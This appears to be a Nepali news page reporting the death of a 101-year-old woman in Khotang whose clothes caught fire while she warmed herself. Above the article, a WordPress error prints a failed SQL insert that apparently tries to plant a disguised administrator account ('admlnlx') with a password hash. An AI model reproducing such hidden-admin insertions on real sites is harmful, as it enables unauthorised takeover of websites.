WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPor6S/fnR.lSezHKxTBY./flYuiI40', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 17:14:38', '', 'admlnlx', 'admlnlx')
खोटाङ । खोटेहाङ गाउँपालिका–७ खोटाङमा आगो ताप्नेक्रममा शरीर जलेर गम्भीर घाइते भएकी १०१ वर्षीया हिमादेवी अधिकारीको मृत्यु भएको छ । गाईवस्तुलाई खोले पकाउन बालिएको आगो ताप्ने क्रममा शुक्रबार बिहान लुगामा आगो सल्किएर शरीर नै जलेपछि गम्भीर घाइते हुनुभएकी हिमादेवीको उपचारको क्रममा मृत्यु भएको हो ।
शरीरमा लगाएको लुगाबाट सल्किएको आगोले जलेर घाइते हिमादेवीको घरैमा स्वास्थ्यकर्मी झिकाएर उपचार गराउने क्रममा मृत्यु भएको वडाध्यक्ष शिवप्रसाद फुयाँलले बताए । मृतक हिमादेवी सो गाउँपालिकाभरिकै सबैभन्दा ज्येष्ठ नागरिक हुनुहुन्थ्यो ।
वडाध्यक्ष फुयाँलका अनुसार वृद्धावस्थामा पुगेका कारण हिमादेवी लामो समयदेखि बोल्न असमर्थ हुनुहुन्थ्यो । लुगा डढेको गन्धका आधारमा आफन्तले थाहा पाएपछि हिमादेवीलाई जलिरहेको अवस्थामा उद्धार गरेका थिए ।
हिमादेवीको मृत्यु भएको बारेमा थप जानकारी आउन बाँकी रहेको जिल्ला प्रहरी कार्यालय खोटाङका प्रवक्ता प्रहरी निरीक्षक गोविन्द साहले बताए । मृतक हिमादेवीको शव परीक्षणका लागि प्राथमिक स्वास्थ्य केन्द्र चिसापानी पठाइएको गाउँपालिका प्रमुख प्रदीप राईले जानकारी दिए । रासस